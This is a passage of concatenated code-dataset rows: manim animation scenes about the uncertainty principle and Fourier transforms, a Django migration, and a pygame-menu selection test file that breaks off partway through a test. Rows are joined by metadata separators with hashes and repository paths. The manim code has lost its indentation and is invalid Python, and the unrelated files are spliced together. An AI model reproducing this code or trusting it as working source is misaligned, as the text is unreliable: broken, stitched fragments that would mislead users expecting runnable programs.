frequency_axes.coords_to_point(1, 0.1),
color = YELLOW,
)
fourier_label = TextMobject("Fourier Transform")
fourier_label.next_to(arrow.get_center(), RIGHT)
self.play(ReplacementTransform(
self.axes.copy(), frequency_axes
))
self.play(
MoveToTarget(wave_copy, remover = True),
fourier_graph.restore,
GrowArrow(arrow),
Write(fourier_label, run_time = 1),
)
self.wait()
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
self.fourier_label = VGroup(arrow, fourier_label)
def show_correlations_with_pure_frequencies(self):
frequency_axes = self.frequency_axes
axes = self.axes
sinusoid = axes.get_graph(
lambda x : 0.5*np.cos(TAU*x),
x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,
)
sinusoid.to_edge(UP, buff = SMALL_BUFF)
v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)
f_equals = TexMobject("f = ")
freq_decimal = DecimalNumber(1)
freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)
freq_label = VGroup(f_equals, freq_decimal)
freq_label.next_to(
v_line, UP, SMALL_BUFF,
submobject_to_align = f_equals[0]
)
self.play(
ShowCreation(sinusoid),
ShowCreation(v_line),
Write(freq_label, run_time = 1),
FadeOut(self.fourier_label)
)
last_f = 1
for f in 1.4, 0.7, 1:
self.play(
sinusoid.stretch,f/last_f, 0,
{"about_point" : axes.coords_to_point(0, 0)},
v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,
MaintainPositionRelativeTo(freq_label, v_line),
ChangeDecimalToValue(freq_decimal, f),
run_time = 3,
)
last_f = f
self.play(*list(map(FadeOut, [
sinusoid, v_line, freq_label
])))
def this_is_momentum(self):
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"xi" : YELLOW,
})
formula.next_to(
self.frequency_x_axis_label, UP
)
f_max = 0.12
brace = Brace(Line(2*LEFT, 2*RIGHT), UP)
brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)
words = TextMobject("This wave \\\\ describes momentum")
words.next_to(brace, UP)
self.play(Write(formula))
self.wait()
self.play(
GrowFromCenter(brace),
Write(words)
)
brace.add(words)
for k in 2, 0.5, 1:
self.play(
self.k_tracker.set_value, k,
self.wave_update_animation,
self.fourier_graph_update_animation,
UpdateFromFunc(
brace, lambda b : b.move_to(
self.frequency_axes.coords_to_point(
self.k_tracker.get_value(),
f_max,
),
DOWN
)
),
run_time = 2
)
self.wait()
self.play(*list(map(FadeOut, [brace, words, formula])))
def show_tradeoff(self):
for a in 5, 0.1, 0.01, 10, 0.5:
self.play(
ApplyMethod(
self.a_tracker.set_value, a,
run_time = 2
),
self.wave_update_animation,
self.fourier_graph_update_animation
)
self.wait()
def get_wave_func(self):
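        # Gaussian wave packet: carrier frequency k centered at x0; larger a
        # localizes it in position and broadens its Fourier transform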
x0 = self.x0_tracker.get_value()
k = self.k_tracker.get_value()
a = self.a_tracker.get_value()
A = a**(0.25)
return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)
def get_wave(self, axes):
return axes.get_graph(
self.get_wave_func(),
color = self.wave_color,
stroke_width = self.wave_stroke_width
)
class DopplerComparisonTodos(TODOStub):
CONFIG = {
"message" : """
Insert some Doppler footage,
insert some hanging spring scene,
insert position-momentum Fourier trade-off
"""
}
class MusicalNote(AddingPureFrequencies):
def construct(self):
speaker = self.speaker = SVGMobject(file_name = "speaker")
speaker.move_to(2*DOWN)
randy = self.pi_creature
axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5
)
axes.center().to_edge(UP)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
graph = axes.get_graph(
lambda x : op.mul(
np.exp(-0.2*(x-4)**2),
0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),
),
)
graph.set_color(BLUE)
v_line = DashedLine(ORIGIN, 0.5*UP)
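        # updater: keep the dashed line spanning from the newest point of the
        # graph down to its projection onto the x-axis as the curve is drawn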
v_line_update = UpdateFromFunc(
v_line, lambda l : l.put_start_and_end_on_with_projection(
graph.points[-1],
axes.x_axis.number_to_point(
axes.x_axis.point_to_number(graph.points[-1])
)
)
)
self.add(speaker, axes)
self.play(
randy.change, "pondering",
self.get_broadcast_animation(n_circles = 6, run_time = 5),
self.get_broadcast_animation(n_circles = 12, run_time = 5),
ShowCreation(graph, run_time = 5, rate_func=linear),
v_line_update
)
self.wait(2)
class AskAboutUncertainty(TeacherStudentsScene):
def construct(self):
self.student_says(
"What does this have \\\\ to do with ``certainty''",
bubble_kwargs = {"direction" : LEFT},
student_index = 2
)
self.play(PiCreatureSays(
self.students[0],
"What even are \\\\ these waves?",
target_mode = "confused"
))
self.wait(2)
class ProbabalisticDetection(FourierTransformOfWaveFunction):
CONFIG = {
"wave_stroke_width" : 2,
}
def construct(self):
self.setup_wave()
self.detect_only_single_points()
self.show_probability_distribution()
self.show_concentration_of_the_wave()
def setup_wave(self):
axes = Axes(
x_min = 0, x_max = 10,
y_min = -0.5, y_max = 1.5,
y_axis_config = {
"unit_size" : 1.5,
"tick_frequency" : 0.25,
}
)
axes.set_stroke(width = 2)
axes.center()
self.x0_tracker.set_value(5)
self.k_tracker.set_value(1)
self.a_tracker.set_value(0.2)
wave = self.get_wave(axes)
self.wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.k_tracker.save_state()
self.k_tracker.set_value(0)
bell_curve = self.get_wave(axes)
self.k_tracker.restore()
bell_curve.set_stroke(width = 0)
bell_curve.set_fill(BLUE, opacity = 0.5)
squared_bell_curve = axes.get_graph(
lambda x : bell_curve.underlying_function(x)**2
).match_style(bell_curve)
self.set_variables_as_attrs(
axes, wave, bell_curve, squared_bell_curve
)
def detect_only_single_points(self):
particle = ProbabalisticDotCloud(
n_copies = 100,
fill_opacity = 0.05,
time_per_change = 0.05,
)
particle.mobject[0].set_fill(BLUE, opacity = 1)
gdw = particle.gaussian_distribution_wrapper
rect = Rectangle(
stroke_width = 0,
height = 0.5,
width = 2,
)
rect.set_fill(YELLOW, 0.3)
rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))
brace = Brace(rect, UP, buff = 0)
question = TextMobject("Do we detect the particle \\\\ in this region?")
question.next_to(brace, UP)
question.add_background_rectangle()
rect.save_state()
rect.stretch(0, 0)
gdw_anim = Mobject.add_updater(
gdw, lambda m : m.set_width(
2.0/(self.a_tracker.get_value()**(0.5))
).move_to(rect)
)
self.add(rect, brace, question)
yes = TextMobject("Yes").set_color(GREEN)
no = TextMobject("No").set_color(RED)
for word in yes, no:
word.next_to(rect, DOWN)
answer = VGroup()
def update_answer(answer):
px = particle.mobject[0].get_center()[0]
lx = rect.get_left()[0]
rx = rect.get_right()[0]
if lx < px < rx:
answer.submobjects = [yes]
else:
answer.submobjects = [no]
answer_anim = Mobject.add_updater(answer, update_answer)
self.add(gdw_anim, particle)
self.play(
GrowFromCenter(brace),
rect.restore,
Write(question)
)
self.wait()
self.add(answer_anim)
self.wait(4)
self.add_foreground_mobjects(answer, particle.mobject)
self.question_group = VGroup(question, brace)
self.particle = particle
self.rect = rect
def show_probability_distribution(self):
axes = self.axes
wave = self.wave
bell_curve = self.bell_curve
question_group = self.question_group
gdw = self.particle.gaussian_distribution_wrapper
rect = self.rect
v_lines = VGroup(*[
DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)
for point in (rect.get_left(), rect.get_right())
])
self.play(
FadeIn(VGroup(axes, wave)),
question_group.next_to, v_lines, UP, {"buff" : 0},
*list(map(ShowCreation, v_lines))
)
self.wait(10)
def show_concentration_of_the_wave(self):
self.play(
self.a_tracker.set_value, 5,
self.wave_update_animation,
)
self.wait(10)
class HeisenbergCommentTodos(TODOStub):
CONFIG = {
"message" : "Insert position-momentum trade-off"
}
class HeisenbergPetPeeve(PiCreatureScene):
def construct(self):
morty, other = self.pi_creatures
particle = ProbabalisticDotCloud()
gdw = particle.gaussian_distribution_wrapper
gdw.to_edge(UP, buff = LARGE_BUFF)
gdw.stretch_to_fit_width(3)
gdw.rotate(3*DEGREES)
self.add(particle)
self.wait()
self.play(PiCreatureSays(
other, """
According to the H.U.P., the \\\\
universe is unknowable!
""",
target_mode = "speaking"
))
self.play(morty.change, "angry")
self.wait(3)
self.play(
PiCreatureSays(
morty, "Well, yes and no",
target_mode = "sassy",
),
RemovePiCreatureBubble(
other, target_mode = "erm"
)
)
self.wait(4)
def create_pi_creatures(self):
morty = Mortimer()
morty.to_corner(DOWN+RIGHT)
other = PiCreature(color = MAROON_E)
other.to_edge(DOWN).shift(3*LEFT)
return VGroup(morty, other)
class OneLevelDeeper(Scene):
def construct(self):
heisenberg = ImageMobject("Heisenberg")
heisenberg.to_corner(UP+LEFT)
self.add(heisenberg)
hup_words = TextMobject("Heisenberg's uncertainty principle")
wave_words = TextMobject("Interpretation of the wave function")
arrow = Vector(UP)
group = VGroup(hup_words, arrow, wave_words)
group.arrange(DOWN)
randomness = ProbabalisticMobjectCloud(
TextMobject("Randomness"),
n_copies = 5,
time_per_change = 0.05
)
gdw = randomness.gaussian_distribution_wrapper
gdw.rotate(TAU/4)
gdw.set_height(1)
# gdw.set_width(4)
gdw.next_to(hup_words, UP, MED_LARGE_BUFF)
self.add(hup_words, randomness)
self.wait(4)
self.play(
FadeIn(wave_words),
GrowArrow(arrow),
ApplyMethod(
gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,
path_arc = TAU/2,
)
)
self.wait(6)
class BetterTranslation(TeacherStudentsScene):
def construct(self):
english_term = TextMobject("Uncertainty principle")
german_word = TextMobject("Unschärferelation")
translation = TextMobject("Unsharpness relation")
to_german_words = TextMobject("In German")
to_german_words.scale(0.5)
to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)
to_german_words.set_color(YELLOW)
to_german_group = VGroup(to_german_arrow, to_german_words)
translation_words = TextMobject("Literal translation")
translation_words.scale(0.5)
translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)
translation_words.set_color(YELLOW)
translation_group = VGroup(translation_arrow, translation_words)
english_term.next_to(self.teacher, UP+LEFT)
english_term.save_state()
english_term.shift(DOWN)
english_term.fade(1)
self.play(
english_term.restore,
self.get_student_changes(*["pondering"]*3)
)
self.wait()
german_word.move_to(english_term)
to_german_group.next_to(
german_word, UP,
submobject_to_align = to_german_arrow
)
self.play(
self.teacher.change, "raise_right_hand",
english_term.next_to, to_german_arrow, UP
)
self.play(
GrowArrow(to_german_arrow),
FadeIn(to_german_words),
ReplacementTransform(
english_term.copy().fade(1),
german_word
)
)
self.wait(2)
group = VGroup(english_term, to_german_group, german_word)
translation.move_to(german_word)
translation_group.next_to(
german_word, UP,
submobject_to_align = translation_arrow
)
self.play(
group.next_to, translation_arrow, UP,
)
self.play(
GrowArrow(translation_arrow),
FadeIn(translation_words),
ReplacementTransform(
german_word.copy().fade(1),
translation
)
)
self.change_student_modes(*["happy"]*3)
self.wait(2)
class ThinkOfHeisenbergUncertainty(PiCreatureScene):
def construct(self):
morty = self.pi_creature
morty.center().to_edge(DOWN).shift(LEFT)
dot_cloud = ProbabalisticDotCloud()
dot_gdw = dot_cloud.gaussian_distribution_wrapper
dot_gdw.set_width(1)
dot_gdw.rotate(TAU/8)
        dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2)
vector_cloud = ProbabalisticVectorCloud(
center_func = dot_gdw.get_center
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.set_width(0.1)
vector_gdw.rotate(TAU/8)
vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)
time_tracker = ValueTracker(0)
self.add()
freq = 1
continual_anims = [
always_shift(time_tracker, direction = RIGHT, rate = 1),
Mobject.add_updater(
dot_gdw,
lambda d : d.set_width(
(np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
Mobject.add_updater(
vector_gdw,
lambda d : d.set_width(
(-np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
dot_cloud, vector_cloud
]
self.add(*continual_anims)
position, momentum, time, frequency = list(map(TextMobject, [
"Position", "Momentum", "Time", "Frequency"
]))
VGroup(position, time).set_color(BLUE)
VGroup(momentum, frequency).set_color(YELLOW)
groups = VGroup()
for m1, m2 in (position, momentum), (time, frequency):
arrow = TexMobject("\\updownarrow").scale(1.5)
group = VGroup(m1, arrow, m2)
group.arrange(DOWN)
lp, rp = parens = TexMobject("\\big(\\big)")
parens.stretch(1.5, 1)
parens.match_height(group)
lp.next_to(group, LEFT, buff = SMALL_BUFF)
rp.next_to(group, RIGHT, buff = SMALL_BUFF)
group.add(parens)
groups.add(group)
arrow = TexMobject("\\Leftrightarrow").scale(2)
groups.submobjects.insert(1, arrow)
groups.arrange(RIGHT)
groups.next_to(morty, UP+RIGHT, LARGE_BUFF)
groups.shift_onto_screen()
self.play(PiCreatureBubbleIntroduction(
morty, "Heisenberg \\\\ uncertainty \\\\ principle",
bubble_class = ThoughtBubble,
bubble_kwargs = {"height" : 4, "width" : 4, "direction" : RIGHT},
target_mode = "pondering"
))
self.wait()
self.play(morty.change, "confused", dot_gdw)
self.wait(10)
self.play(
ApplyMethod(
VGroup(dot_gdw, vector_gdw ).shift,
FRAME_X_RADIUS*RIGHT,
rate_func = running_start
)
)
self.remove(*continual_anims)
self.play(
morty.change, "raise_left_hand", groups,
FadeIn(
groups,
lag_ratio = 0.5,
run_time = 3,
)
)
self.wait(2)
# End things
class PatreonMention(PatreonThanks):
def construct(self):
morty = Mortimer()
morty.next_to(ORIGIN, DOWN)
patreon_logo = PatreonLogo()
patreon_logo.to_edge(UP)
thank_you = TextMobject("Thank you.")
thank_you.next_to(patreon_logo, DOWN)
self.play(
DrawBorderThenFill(patreon_logo),
morty.change, "gracious"
)
self.play(Write(thank_you))
self.wait(3)
class Promotion(PiCreatureScene):
CONFIG = {
"camera_class" : ThreeDCamera,
"seconds_to_blink" : 5,
}
def construct(self):
aops_logo = AoPSLogo()
aops_logo.next_to(self.pi_creature, UP+LEFT)
url = TextMobject(
"AoPS.com/", "3b1b",
arg_separator = ""
)
url.to_corner(UP+LEFT)
url_rect = Rectangle(color = BLUE)
url_rect.replace(
url.get_part_by_tex("3b1b"),
stretch = True
)
url_rect.stretch_in_place(1.1, dim = 1)
rect = Rectangle(height = 9, width = 16)
rect.set_height(4.5)
rect.next_to(url, DOWN)
rect.to_edge(LEFT)
rect.set_stroke(width = 0)
mathy = Mathematician()
mathy.flip()
mathy.to_corner(DOWN+RIGHT)
morty = self.pi_creature
morty.save_state()
book = ImageMobject("AoPS_volume_2")
book.set_height(2)
book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)
mathy.get_center = mathy.get_top
words = TextMobject("""
Interested in working for \\\\
one of my favorite math\\\\
education companies?
""", alignment = "")
words.to_edge(UP)
arrow = Arrow(
aops_logo.get_top(),
morty.get_top(),
path_arc = -0.4*TAU,
stroke_width = 5,
tip_length = 0.5,
)
arrow.tip.shift(SMALL_BUFF*DOWN)
self.add(words)
self.play(
self.pi_creature.change_mode, "raise_right_hand",
*[
DrawBorderThenFill(
submob,
run_time = 2,
rate_func = squish_rate_func(double_smooth, a, a+0.5)
)
for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))
]
)
self.play(
words.scale, 0.75,
words.next_to, url, DOWN, LARGE_BUFF,
words.shift_onto_screen,
Write(url),
)
self.wait(2)
self.play(
LaggedStartMap(
ApplyFunction, aops_logo,
lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),
rate_func = there_and_back,
run_time = 1,
),
morty.change, "thinking"
)
self.wait()
self.play(ShowCreation(arrow))
self.play(FadeOut(arrow))
self.wait()
# To teacher
self.play(
morty.change_mode, "plain",
morty.flip,
morty.scale, 0.7,
morty.next_to, mathy, LEFT, LARGE_BUFF,
morty.to_edge, DOWN,
FadeIn(mathy),
)
self.play(
PiCreatureSays(
mathy, "",
bubble_kwargs = {"width" : 5},
look_at_arg = morty.eyes,
),
morty.change, "happy",
aops_logo.shift, 1.5*UP + 0.5*RIGHT
)
self.play(Blink(mathy))
self.wait()
self.play(
RemovePiCreatureBubble(
mathy, target_mode = "raise_right_hand"
),
aops_logo.to_corner, UP+RIGHT,
aops_logo.shift, MED_SMALL_BUFF*DOWN,
GrowFromPoint(book, mathy.get_corner(UP+LEFT)),
)
self.play(morty.change, "pondering", book)
self.wait(3)
self.play(Blink(mathy))
self.wait()
self.play(
Animation(
BackgroundRectangle(book, fill_opacity = 1),
remover = True
),
FadeOut(book),
)
print(self.num_plays)
self.play(
FadeOut(words),
ShowCreation(rect),
morty.restore,
morty.change, "happy", rect,
FadeOut(mathy),
)
self.wait(10)
self.play(ShowCreation(url_rect))
self.play(
FadeOut(url_rect),
url.get_part_by_tex("3b1b").set_color, BLUE,
)
self.wait(15)
class PuzzleStatement(Scene):
def construct(self):
aops_logo = AoPSLogo()
url = TextMobject("AoPS.com/3b1b")
url.next_to(aops_logo, UP)
group = VGroup(aops_logo, url)
group.to_edge(UP)
self.add(group)
words = TextMobject("""
AoPS must choose one of 20 people to send to a
tug-of-war tournament. We don't care who we send,
as long as we don't send our weakest person. \\\\ \\\\
Each person has a different strength, but we don't know
those strengths. We get 10 intramural 10-on-10 matches
to determine who we send. Can we make sure we don't send
the weakest person?
""", alignment = "")
words.set_width(FRAME_WIDTH - 2)
words.next_to(group, DOWN, LARGE_BUFF)
self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))
self.wait(2)
class UncertaintyEndScreen(PatreonEndScreen):
CONFIG = {
"specific_patrons" : [
"CrypticSwarm",
"Ali Yahya",
"Juan Benet",
"Markus Persson",
"Damion Kistler",
"Burt Humburg",
"Yu Jun",
"Dave Nicponski",
"Kaustuv DeBiswas",
"Joseph John Cox",
"Luc Ritchie",
"Achille Brighton",
"Rish Kundalia",
"Yana Chernobilsky",
"Shìmín Kuang",
"Mathew Bramson",
"Jerry Ling",
"Mustafa Mahdi",
"Meshal Alshammari",
"Mayank M. Mehrotra",
"Lukas Biewald",
"Robert Teed",
"Samantha D. Suplee",
"Mark Govea",
"John Haley",
"Julian Pulgarin",
"Jeff Linse",
"Cooper Jones",
"Desmos ",
"Boris Veselinovich",
"Ryan Dahl",
"Ripta Pasay",
"Eric Lavault",
"Randall Hunt",
"Andrew Busey",
"Mads Elvheim",
"Tianyu Ge",
"Awoo",
"Dr. David G. Stork",
"Linh Tran",
"Jason Hise",
"Bernd Sing",
"James H. Park",
"Ankalagon ",
"Mathias Jansson",
"David Clark",
"Ted Suzman",
"Eric Chow",
"Michael Gardner",
"David Kedmey",
"Jonathan Eppele",
"Clark Gaebel",
"Jordan Scales",
"Ryan Atallah",
"supershabam ",
"1stViewMaths",
"Jacob Magnuson",
"Chloe Zhou",
"Ross Garber",
"Thomas Tarler",
"Isak Hietala",
"Egor Gumenuk",
"Waleed Hamied",
"Oliver Steele",
"Yaw Etse",
"David B",
"Delton Ding",
"James Thornton",
"Felix Tripier",
"Arthur Zey",
"George Chiesa",
"Norton Wang",
"Kevin Le",
"Alexander Feldman",
"David MacCumber",
"Jacob Kohl",
"Frank Secilia",
"George John",
"Akash Kumar",
"Britt Selvitelle",
"Jonathan Wilson",
"Michael Kunze",
"Giovanni Filippi",
"Eric Younge",
"Prasant Jagannath",
"Andrejs olins",
"Cody Brocious",
],
}
class Thumbnail(Scene):
def construct(self):
uncertainty_principle = TextMobject("Uncertainty \\\\", "principle")
uncertainty_principle[1].shift(SMALL_BUFF*UP)
quantum = TextMobject("Quantum")
VGroup(uncertainty_principle, quantum).scale(2.5)
uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)
quantum.to_edge(DOWN, MED_LARGE_BUFF)
arrow = TexMobject("\\Downarrow")
arrow.scale(4)
arrow.move_to(Line(
uncertainty_principle.get_bottom(),
quantum.get_top(),
))
cross = Cross(arrow)
cross.set_stroke(RED, 20)
is_word, not_word = is_not = TextMobject("is", "\\emph{NOT}")
is_not.scale(3)
is_word.move_to(arrow)
# is_word.shift(0.6*UP)
not_word.set_color(RED)
not_word.set_stroke(RED, 3)
not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)
not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)
dot_cloud = ProbabalisticDotCloud(
n_copies = 1000,
)
dot_gdw = dot_cloud.gaussian_distribution_wrapper
# dot_gdw.rotate(3*DEGREES)
dot_gdw.rotate(25*DEGREES)
# dot_gdw.scale(2)
dot_gdw.scale(2)
# dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)
dot_gdw.move_to(quantum)
def get_func(a):
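            # Gaussian-windowed cosine: larger a -> narrower packet in time,
            # broader Fourier transform (the trade-off being illustrated)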
return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)
axes = Axes(
x_min = -6, x_max = 6,
x_axis_config = {"unit_size" : 0.25}
)
graphs = VGroup(*[
axes.get_graph(get_func(a))
for a in (10, 3, 1, 0.3, 0.1,)
])
graphs.arrange(DOWN, buff = 0.6)
graphs.to_corner(UP+LEFT)
graphs.set_color_by_gradient(BLUE_B, BLUE_D)
frequency_axes = Axes(
x_min = 0, x_max = 2,
x_axis_config = {"unit_size" : 1}
)
fourier_graphs = VGroup(*[
get_fourier_graph(
frequency_axes, graph.underlying_function,
t_min = -10, t_max = 10,
)
for graph in graphs
])
for graph, fourier_graph in zip(graphs, fourier_graphs):
fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)
fourier_graph.scale(3)
fourier_graph.stretch(3, 1)
fourier_graph.move_to(graph)
fourier_graph.to_edge(RIGHT)
self.add(graphs, fourier_graphs)
self.add(dot_cloud)
self.add(
uncertainty_principle, quantum,
)
self.add(arrow, cross)
# self.add(is_word)
# self.add(is_not)
| true
| true
|
f707a4256c7b6a07fa804637aec60c40fb024bfa
| 383
|
py
|
Python
|
server/api/migrations/0005_auto_20180128_1006.py
|
MePsyDuck/OAPS
|
ddbc69fbd11d1a02d37514d48f5dabe04cd23405
|
[
"MIT"
] | null | null | null |
server/api/migrations/0005_auto_20180128_1006.py
|
MePsyDuck/OAPS
|
ddbc69fbd11d1a02d37514d48f5dabe04cd23405
|
[
"MIT"
] | null | null | null |
server/api/migrations/0005_auto_20180128_1006.py
|
MePsyDuck/OAPS
|
ddbc69fbd11d1a02d37514d48f5dabe04cd23405
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-01-28 04:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20180128_1003'),
]
operations = [
migrations.AlterField(
model_name='letter',
name='subject',
field=models.CharField(max_length=100),
),
]
| 21.277778
| 51
| 0.597911
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20180128_1003'),
]
operations = [
migrations.AlterField(
model_name='letter',
name='subject',
field=models.CharField(max_length=100),
),
]
| true
| true
|
f707a45e451d301022f927dfec70269a0d257c04
| 5,578
|
py
|
Python
|
test/test_selection.py
|
arpruss/pygame-menu
|
25cefb5cfc60383544d704b83a32d43dfc621c23
|
[
"MIT"
] | null | null | null |
test/test_selection.py
|
arpruss/pygame-menu
|
25cefb5cfc60383544d704b83a32d43dfc621c23
|
[
"MIT"
] | null | null | null |
test/test_selection.py
|
arpruss/pygame-menu
|
25cefb5cfc60383544d704b83a32d43dfc621c23
|
[
"MIT"
] | null | null | null |
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
TEST WIDGET SELECTION.
Test widget selection effects.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
__all__ = ['SelectionTest']
from test._utils import MenuUtils, surface
import copy
import unittest
from pygame_menu.widgets import Button
from pygame_menu.widgets.selection import LeftArrowSelection, RightArrowSelection, \
HighlightSelection, NoneSelection, SimpleSelection
from pygame_menu.widgets.core.selection import Selection
from pygame_menu.widgets.selection.arrow_selection import ArrowSelection
class SelectionTest(unittest.TestCase):
def setUp(self) -> None:
"""
Setup sound engine.
"""
self.menu = MenuUtils.generic_menu()
self.menu.enable()
def test_copy(self) -> None:
"""
Test copy.
"""
s = LeftArrowSelection()
s1 = copy.copy(s)
s2 = copy.deepcopy(s)
s3 = s.copy()
self.assertNotEqual(s, s1)
self.assertNotEqual(s, s2)
self.assertNotEqual(s, s3)
def test_abstracts(self) -> None:
"""
Test abstract objects errors.
"""
w = Button('epic')
# Create abstract selection object
sel = Selection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: sel.draw(surface, w))
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_arrow(self) -> None:
"""
Test arrow selection.
"""
w = Button('epic')
w.set_selection_effect(LeftArrowSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
w.set_selection_effect(RightArrowSelection())
self.menu.draw(surface)
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_highlight(self) -> None:
"""
Test highlight selection.
"""
w = Button('epic')
border_width = 1
margin_x = 18
margin_y = 10
w.set_selection_effect(HighlightSelection(
border_width=border_width,
margin_x=margin_x,
margin_y=margin_y
))
self.menu.add.generic_widget(w)
self.menu.draw(surface)
# noinspection PyTypeChecker
sel: 'HighlightSelection' = w.get_selection_effect()
self.assertEqual(sel.get_height(), margin_y)
self.assertEqual(sel.get_width(), margin_x)
# Test inflate
rect = w.get_rect()
inflate_rect = sel.inflate(rect)
self.assertEqual(-inflate_rect.x + rect.x, sel.get_width() / 2)
self.assertEqual(-inflate_rect.y + rect.y, sel.get_height() / 2)
# Test margin xy
sel.margin_xy(10, 20)
self.assertEqual(sel.margin_left, 10)
self.assertEqual(sel.margin_right, 10)
self.assertEqual(sel.margin_top, 20)
self.assertEqual(sel.margin_bottom, 20)
# Test null border
sel._border_width = 0
sel.draw(surface, w)
def test_none(self) -> None:
"""
Test none selection.
"""
w = Button('epic')
w.set_selection_effect(NoneSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertFalse(w.get_selection_effect().widget_apply_font_color)
# Widgets default selection effect is None
last_selection = w.get_selection_effect()
w.set_selection_effect()
self.assertIsInstance(w.get_selection_effect(), NoneSelection)
self.assertNotEqual(w.get_selection_effect(), last_selection)
def test_simple(self) -> None:
"""
Test simple selection.
"""
w = Button('epic')
w.set_selection_effect(SimpleSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertTrue(w.get_selection_effect().widget_apply_font_color)
| 33.401198
| 84
| 0.644676
|
__all__ = ['SelectionTest']
from test._utils import MenuUtils, surface
import copy
import unittest
from pygame_menu.widgets import Button
from pygame_menu.widgets.selection import LeftArrowSelection, RightArrowSelection, \
HighlightSelection, NoneSelection, SimpleSelection
from pygame_menu.widgets.core.selection import Selection
from pygame_menu.widgets.selection.arrow_selection import ArrowSelection
class SelectionTest(unittest.TestCase):
def setUp(self) -> None:
self.menu = MenuUtils.generic_menu()
self.menu.enable()
def test_copy(self) -> None:
s = LeftArrowSelection()
s1 = copy.copy(s)
s2 = copy.deepcopy(s)
s3 = s.copy()
self.assertNotEqual(s, s1)
self.assertNotEqual(s, s2)
self.assertNotEqual(s, s3)
def test_abstracts(self) -> None:
w = Button('epic')
sel = Selection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: sel.draw(surface, w))
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_arrow(self) -> None:
w = Button('epic')
w.set_selection_effect(LeftArrowSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
w.set_selection_effect(RightArrowSelection())
self.menu.draw(surface)
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_highlight(self) -> None:
w = Button('epic')
border_width = 1
margin_x = 18
margin_y = 10
w.set_selection_effect(HighlightSelection(
border_width=border_width,
margin_x=margin_x,
margin_y=margin_y
))
self.menu.add.generic_widget(w)
self.menu.draw(surface)
sel: 'HighlightSelection' = w.get_selection_effect()
